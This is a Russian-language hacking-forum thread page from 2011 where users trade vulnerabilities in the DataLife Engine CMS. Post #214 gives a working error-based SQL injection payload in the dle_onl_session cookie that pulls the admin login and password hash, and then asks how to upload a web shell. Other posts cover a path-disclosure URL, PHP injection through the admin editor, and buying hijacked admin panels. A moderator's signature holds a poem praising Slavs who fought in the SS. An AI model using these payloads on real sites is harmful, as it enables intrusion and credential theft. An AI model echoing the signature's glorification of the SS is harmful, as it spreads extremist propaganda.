HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 24.07.2011, 22:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от slva2000  
slva2000 said:
теги
Код HTML:
HTML:
Код HTML:
HTML:
не прокатывают в "Реактор HTML кода"
Не прокатывают или просто phpinfo ты не видишь? Глянь соурс html - там наверняка увидешь свои теги и php код.

Лично я попробовал способ Kuteke на 8.2 - нифига код не исполняется, тупо выводится плейн текстом мое , а в исходниках движка даже намека на исполнение php в страницах нет.

Потом специально поставил dle 8.5, попробовал снова - точно так же плейнтекстом мне выдается в соурсе.

Kuteke, в какой версии DLE ты это пробовал?
 
Ответить с цитированием

  #212  
Старый 28.07.2011, 23:24
ride
Новичок
Регистрация: 18.04.2010
Сообщений: 0
Провел на форуме:
753

Репутация: 0
По умолчанию

Есть ли что-нибудь более-менее серьезное в сборке DLE 8.5 от SoftDLE? (http://www.softdle.com/dle/177-dle-85.html)

Нашел только раскрытие путей

engine/ajax/pages.php?year[]=&month[]=&user[]=&day[]=
 
Ответить с цитированием

  #213  
Старый 29.07.2011, 15:10
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию

попугай

Я пробовал 8.2, 8.5, 8.3! Пахало! Даже в разделе Продажа покупал админки и все ОК! Я кажется знаю ваши ошибки! Вы просто не ставите галку напротив "Нефильтрованный HTML"!
 
Ответить с цитированием

  #214  
Старый 31.07.2011, 10:02
LIberman
Новичок
Регистрация: 24.11.2008
Сообщений: 1
Провел на форуме:
7435

Репутация: 0
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]dle_onl_session[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]'+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,name,password)+from+dle_users+where+user_group=1+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+[/COLOR][/COLOR] 
Через куки достается хеш админа.

Подскажите какой запрос сделать для заливки шелла? Или чего еще интересного можно наскулить)

гугл пробовал) те варианты выводят "1064"
 
Ответить с цитированием

  #215  
Старый 31.07.2011, 18:00
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Kuteke  
Kuteke said:
попугай
Я пробовал 8.2, 8.5, 8.3! Пахало! Даже в разделе Продажа покупал админки и все ОК! Я кажется знаю ваши ошибки! Вы просто не ставите галку напротив "Нефильтрованный HTML"!
ставлю, конечно, делал как ты написал несколькими постами выше.

Отпиши мне в личку, скинь соурсы двжиков, на которых это работало, если не затруднит.
 
Ответить с цитированием

  #216  
Старый 01.08.2011, 11:28
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
Не прокатывают или просто phpinfo ты не видишь? Глянь соурс html - там наверняка увидешь свои теги и php код.
Лично я попробовал способ
Kuteke
на 8.2 - нифига код не исполняется, тупо выводится плейн текстом мое , а в исходниках движка даже намека на исполнение php в страницах нет.
Потом специально поставил dle 8.5, попробовал снова - точно так же плейнтекстом мне выдается в соурсе.
Kuteke
, в какой версии DLE ты это пробовал?
Они именно затираются послеки клика по Ява-окну "Редактор HTML"-> "Отправить". Второй клик на открытие редактора, и теги уже затёрты, т.е. парсер при отправке отредактированного текста, их затирает.
 
Ответить с цитированием

  #217  
Старый 01.08.2011, 11:35
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от slva2000  
slva2000 said:
Они именно затираются послеки клика по Ява-окну "Редактор HTML"-> "Отправить". Второй клик на открытие редактора, и теги уже затёрты, т.е. парсер при отправке отредактированного текста, их затирает.
ну я визуальный редактор не использовал - в обычном текстовом поле прекрасно
 
Ответить с цитированием

  #218  
Старый 24.08.2011, 02:12
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

так ребята, все что связано с покупкой не в этот раздел, здесь только то что найдено вами, ни какой коммерческой деятельности, попрошу не захломлять раздел ....Присутсвует слово куплю, значит вам разделом купля/продажа
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #219  
Старый 03.09.2011, 18:28
Wap-Traff
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Как через админку залить шелл в версии 9.2
 
Ответить с цитированием

  #220  
Старый 03.09.2011, 18:44
extrimportal
Guest
Сообщений: n/a
Провел на форуме:
27755

Репутация: 0
По умолчанию

насколько мне известно, то пока что - никак. начиная с версии какой то там, где в шаблоне пхп блочится шелл с админки залить нельзя. возможно ошибаюсь конечно, но так было.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ